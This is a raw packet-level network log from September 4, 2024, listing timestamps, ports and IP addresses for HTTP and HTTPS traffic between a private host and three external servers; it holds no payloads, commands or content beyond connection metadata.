Sep 4, 2024 17:37:08.751133919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751163006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751286983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751297951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751313925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751324892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751326084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751334906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751344919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751346111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751358032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751374006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751383066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751399040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751408100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751436949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751451969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751461983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751471043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751482964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751492023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751506090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751532078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751533031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751569033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751632929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751648903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751658916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751668930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751671076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751679897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751686096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751691103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751712084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751717091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751725912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751743078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751841068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751852989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751863003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751873970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751874924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751884937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751890898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751897097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751902103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751930952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751970053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751981020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751991034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752003908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752008915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752029896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752053022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752152920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752163887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752172947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752183914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752191067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752194881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752199888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752207041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752223015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752229929 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752238035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752264977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752610922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752621889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752630949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752641916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752651930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752659082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752661943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752674103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752679110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752690077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752696991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752701044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752708912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752712965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752724886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752732038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752734900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752746105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752756119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752756119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.752779007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752804995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752804995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.752996922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753007889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753017902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753036022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753038883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753052950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753057003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753065109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753076077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753077984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753086090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753097057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753099918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753107071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753115892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753118992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753130913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753140926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753144026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753151894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.753158092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753181934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.753206015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.756418943 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.756433964 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.756479025 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.756490946 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.756525040 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.756990910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757002115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757010937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757030964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.757046938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.757086039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757102013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757112980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757118940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.757126093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757138968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.757138968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.757154942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.757177114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.770230055 CEST	80	49726	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:08.770314932 CEST	49726	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:08.770359039 CEST	49726	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:08.775192022 CEST	80	49726	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:08.777168036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777185917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777199030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777208090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777216911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777216911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.777229071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777230024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.777261019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.777292013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777301073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.777326107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.777344942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.778496027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778506994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778516054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778534889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.778546095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.778620958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778631926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778640985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778664112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.778675079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.778795004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.778831959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779172897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779182911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779192924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779233932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779247999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779262066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779273987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779282093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779290915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779300928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779304981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779318094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779330969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779360056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779371023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779397011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779427052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779438019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779447079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779457092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779460907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779469013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.779469967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779495001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.779510021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.784845114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.784856081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.784867048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.784889936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.784899950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.784910917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.784940004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.784989119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785000086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785007954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785033941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.785043001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.785693884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785780907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.785841942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785852909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785862923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785873890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785883904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785895109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.785913944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.785943031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.786884069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.786935091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.786935091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.786947966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.786974907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.786986113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787008047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787019968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787035942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787056923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787065029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787076950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787161112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787174940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787184954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787197113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787204027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787209034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787220955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787225962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787246943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787270069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787290096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787301064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787327051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787343025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787396908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787409067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787424088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787436008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787439108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787446022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787446976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787462950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787468910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787477016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.787489891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.787514925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.788794994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788832903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788844109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788847923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.788865089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788877964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788878918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.788901091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.788925886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.788945913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788959980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788969994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.788986921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.788995981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789026976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789036989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789047003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789067984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789093971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789247990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789259911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789269924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789284945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789299011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789302111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789339066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789347887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789347887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789360046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789378881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789395094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789452076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789462090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789469957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789494991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789510965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789522886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789535999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789561033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789570093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789602041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789612055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789621115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789644957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789645910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789665937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789681911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.789941072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.789989948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.790000916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.790040970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.791986942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.791997910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792006969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792046070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.792067051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.792071104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792083025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792093039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792103052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792114019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.792119980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.792148113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.792210102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.792251110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.793809891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.793832064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.793844938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.793863058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.793883085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.793962002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.793972969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.793982983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.793993950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.794003010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.794035912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.831054926 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.831072092 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.831140041 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.831155062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.831199884 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.832184076 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.832200050 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.832253933 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.832262039 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.832300901 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.834026098 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.834042072 CEST	443	49727	158.69.225.124	192.168.2.6
